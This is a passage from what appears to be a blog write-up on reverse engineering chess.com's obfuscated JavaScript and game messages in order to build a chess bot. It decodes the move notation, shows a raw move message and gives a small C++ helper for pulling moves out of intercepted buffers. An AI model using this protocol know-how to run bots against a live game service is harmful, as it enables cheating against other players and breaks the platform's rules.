class="w"> </span><span class="s">"d1"</span><span class="p">,</span><span class="s">"_l"</span><span class="o">:</span><span class="w"> </span><span class="s">"d2"</span><span class="p">,</span><span class="s">"_t"</span><span class="o">:</span><span class="w"> </span><span class="s">"d3"</span><span class="p">,</span><span class="s">"_B"</span><span class="o">:</span><span class="w"> </span><span class="s">"d4"</span><span class="p">,</span><span class="s">"_J"</span><span class="o">:</span><span class="w"> </span><span class="s">"d5"</span><span class="p">,</span><span class="s">"_R"</span><span class="o">:</span><span class="w"> </span><span class="s">"d6"</span><span class="p">,</span><span 
class="s">"_Z"</span><span class="o">:</span><span class="w"> </span><span class="s">"d7"</span><span class="p">,</span><span class="s">"_7"</span><span class="o">:</span><span class="w"> </span><span class="s">"d8"</span><span class="p">,</span><span class="s">"_e"</span><span class="o">:</span><span class="w"> </span><span class="s">"e1"</span><span class="p">,</span><span class="s">"_m"</span><span class="o">:</span><span class="w"> </span><span class="s">"e2"</span><span class="p">,</span><span class="s">"_u"</span><span class="o">:</span><span class="w"> </span><span class="s">"e3"</span><span class="p">,</span><span class="s">"_C"</span><span class="o">:</span><span class="w"> </span><span class="s">"e4"</span><span class="p">,</span><span class="s">"_K"</span><span class="o">:</span><span class="w"> </span><span class="s">"e5"</span><span class="p">,</span><span class="s">"_S"</span><span class="o">:</span><span class="w"> </span><span class="s">"e6"</span><span class="p">,</span><span class="s">"_0"</span><span class="o">:</span><span class="w"> </span><span class="s">"e7"</span><span class="p">,</span><span class="s">"_8"</span><span class="o">:</span><span class="w"> </span><span class="s">"e8"</span><span class="p">,</span><span class="s">"_f"</span><span class="o">:</span><span class="w"> </span><span class="s">"f1"</span><span class="p">,</span><span class="s">"_n"</span><span class="o">:</span><span class="w"> </span><span class="s">"f2"</span><span class="p">,</span><span class="s">"_v"</span><span class="o">:</span><span class="w"> </span><span class="s">"f3"</span><span class="p">,</span><span class="s">"_D"</span><span class="o">:</span><span class="w"> </span><span class="s">"f4"</span><span class="p">,</span><span class="s">"_L"</span><span class="o">:</span><span class="w"> </span><span class="s">"f5"</span><span class="p">,</span><span class="s">"_T"</span><span class="o">:</span><span class="w"> </span><span class="s">"f6"</span><span 
class="p">,</span><span class="s">"_1"</span><span class="o">:</span><span class="w"> </span><span class="s">"f7"</span><span class="p">,</span><span class="s">"_9"</span><span class="o">:</span><span class="w"> </span><span class="s">"f8"</span><span class="p">,</span><span class="s">"_g"</span><span class="o">:</span><span class="w"> </span><span class="s">"g1"</span><span class="p">,</span><span class="s">"_o"</span><span class="o">:</span><span class="w"> </span><span class="s">"g2"</span><span class="p">,</span><span class="s">"_w"</span><span class="o">:</span><span class="w"> </span><span class="s">"g3"</span><span class="p">,</span><span class="s">"_E"</span><span class="o">:</span><span class="w"> </span><span class="s">"g4"</span><span class="p">,</span><span class="s">"_M"</span><span class="o">:</span><span class="w"> </span><span class="s">"g5"</span><span class="p">,</span><span class="s">"_U"</span><span class="o">:</span><span class="w"> </span><span class="s">"g6"</span><span class="p">,</span><span class="s">"_2"</span><span class="o">:</span><span class="w"> </span><span class="s">"g7"</span><span class="p">,</span><span class="s">"_!"</span><span class="o">:</span><span class="w"> </span><span class="s">"g8"</span><span class="p">,</span><span class="s">"_h"</span><span class="o">:</span><span class="w"> </span><span class="s">"h1"</span><span class="p">,</span><span class="s">"_p"</span><span class="o">:</span><span class="w"> </span><span class="s">"h2"</span><span class="p">,</span><span class="s">"_x"</span><span class="o">:</span><span class="w"> </span><span class="s">"h3"</span><span class="p">,</span><span class="s">"_F"</span><span class="o">:</span><span class="w"> </span><span class="s">"h4"</span><span class="p">,</span><span class="s">"_N"</span><span class="o">:</span><span class="w"> </span><span class="s">"h5"</span><span class="p">,</span><span class="s">"_V"</span><span class="o">:</span><span class="w"> </span><span 
class="s">"h6"</span><span class="p">,</span><span class="s">"_3"</span><span class="o">:</span><span class="w"> </span><span class="s">"h7"</span><span class="p">,</span><span class="s">"_?"</span><span class="o">:</span><span class="w"> </span><span class="s">"h8"</span><span class="p">};</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z56f6c</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"{"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z87e36</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"~"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">zbba2c</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"}"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z7fd23</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"("</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">za93ff</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"^"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z536e1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">")"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z817b2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"["</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z00e3d</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"_"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">ze4b5e</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"]"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z91a79</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"@"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">zc21d8</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"#"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">zaa236</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"$"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">};</span><span class="w"></span>
<span class="w"> </span><span class="n">zf9bd6</span><span class="p">.</span><span class="n">prototype</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{</span><span class="n">z0cd66</span><span class="o">:</span><span class="w"> </span><span class="n">function</span><span class="p">(</span><span class="n">ze2e37</span><span class="p">,</span><span class="w"> </span><span class="n">zbd29b</span><span class="p">,</span><span class="w"> </span><span class="n">z2ba00</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">zed3d4</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z6439d</span><span class="p">[</span><span class="n">ze2e37</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">z98075</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z6439d</span><span class="p">[</span><span class="n">zbd29b</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z2ba00</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">dir</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">zbd29b</span><span class="p">.</span><span class="n">charCodeAt</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">ze2e37</span><span class="p">.</span><span class="n">charCodeAt</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z2ba00</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="s">"q"</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">z98075</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">dir</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z56f6c</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="p">((</span><span class="n">dir</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="o">+</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">zbba2c</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z87e36</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z2ba00</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="s">"n"</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">z98075</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">dir</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z7fd23</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="p">((</span><span class="n">dir</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="o">+</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z536e1</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">za93ff</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z2ba00</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="s">"r"</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">z98075</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">dir</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z817b2</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="p">((</span><span class="n">dir</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="o">+</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">ze4b5e</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z00e3d</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z2ba00</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="s">"b"</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">z98075</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">dir</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z91a79</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="p">((</span><span class="n">dir</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="o">+</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">zaa236</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">zc21d8</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">zed3d4</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">z98075</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="n">zafc74</span><span class="o">:</span><span class="w"> </span><span class="n">function</span><span class="p">(</span><span class="n">z32182</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">zed3d4</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z32182</span><span class="p">.</span><span class="n">charAt</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">z98075</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z32182</span><span class="p">.</span><span class="n">charAt</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">ze2e37</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">ze8500</span><span class="p">[</span><span class="s">"_"</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">zed3d4</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">zbd29b</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">null</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">z2b70d</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ze2e37</span><span class="p">.</span><span class="n">charCodeAt</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">null</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z56f6c</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"q"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z87e36</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"q"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">zbba2c</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"q"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z7fd23</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"n"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">za93ff</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"n"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z536e1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"n"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z817b2</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"r"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z00e3d</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"r"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">ze4b5e</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"r"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z91a79</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"b"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">zc21d8</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"b"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">zaa236</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"b"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z5b3be</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">null</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">zd2788</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ze2e37</span><span class="p">.</span><span class="n">charAt</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">zd2788</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">7</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">zbd29b</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">String</span><span class="p">.</span><span class="n">fromCharCode</span><span class="p">(</span><span class="n">z5b3be</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s">"8"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">zd2788</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">zbd29b</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">String</span><span class="p">.</span><span class="n">fromCharCode</span><span class="p">(</span><span class="n">z5b3be</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s">"1"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">else</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">null</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">zbd29b</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">ze8500</span><span class="p">[</span><span class="s">"_"</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">z98075</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">zbd29b</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">null</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">z3cbd9</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{};</span><span class="w"></span>
<span class="w"> </span><span class="n">z3cbd9</span><span class="p">[</span><span class="s">"fromArea"</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ze2e37</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z3cbd9</span><span class="p">[</span><span class="s">"toArea"</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">zbd29b</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z3cbd9</span><span class="p">[</span><span class="s">"additionalInfo"</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2ba00</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">z3cbd9</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="n">za902f</span><span class="o">:</span><span class="w"> </span><span class="n">function</span><span class="p">(</span><span class="n">zcc2ef</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z6439d</span><span class="p">[</span><span class="n">zcc2ef</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="n">z398d0</span><span class="o">:</span><span class="w"> </span><span class="n">function</span><span class="p">(</span><span class="n">zccfb6</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">ze8500</span><span class="p">[</span><span class="s">"_"</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">zccfb6</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="p">}};</span><span class="w"></span>
<span class="p">})();</span><span class="w"></span>
</code></pre></div>
<p>Before I forget: why on earth are you guys at chess.com obfuscating
your JS code? It probably makes sense to pack and encrypt the binaries
of big games (which talented crackers still crack very quickly), but
why obscure JavaScript? It's just too easy to reverse the logic with
existing tools such as DevTools or Firebug, so why even
bother?</p>
<p>Now, with the function above, we can look the move up, which reveals "mC"
== "e3e5". So we now know how to encode/decode the move notation. Let's
inspect the next message:</p>
<p><strong>4. Writing my first move (outgoing Message)</strong></p>
<div class="highlight"><pre><span></span><code>[{"channel":"/service/user","data":{"move":{"gid":709341692,"seq":1,"uid":"EatingSpiders","move":"YI","clock":600,"clockms":60000,"squared":false},"sid":"gserv","tid":"Move"},"id":"259","clientId":"6djua267g6n8ydja21m8yhztj3gtpx"}]
</code></pre></div>
<p>Nothing new here; this is just my browser sending the move "YI" to the
game server. You can look it up on your own now, since I have identified
the decoding mechanism above.</p>
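<p>To make the message layout a bit more concrete, here is a minimal sketch of how the encoded move could be pulled out of such a raw message buffer. The helper name <code>extract_move</code> is hypothetical and not part of the bot; it also assumes that the encoded move never contains a double quote, which I have not verified for every possible move.</p>

```cpp
#include <cstddef>
#include <string>

// Hypothetical helper (not taken from the bot): return the value of the
// inner "move":"..." field of a raw message, or "" if there is none.
// The buffer does not have to be NUL-terminated.
std::string extract_move(const char *buf, std::size_t len) {
    // The outer field is "move":{...}, so searching for the key followed
    // by an opening quote only matches the inner, encoded move.
    static const std::string key = "\"move\":\"";
    const std::string msg(buf, len);

    std::size_t start = msg.find(key);
    if (start == std::string::npos) return "";
    start += key.size();

    // Assumption: the encoded move itself contains no double quote.
    const std::size_t end = msg.find('"', start);
    if (end == std::string::npos) return "";
    return msg.substr(start, end - start);
}
```

<p>A real JSON parser would be more robust, but a plain substring search is cheap enough to run on every buffer that passes through a hook.</p>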
<p>The following messages are essentially like the previous two (with
status <em>in_progress</em> in place of the initial <em>starting</em>): I always
receive the opponent's move and then send my own. So we have all the
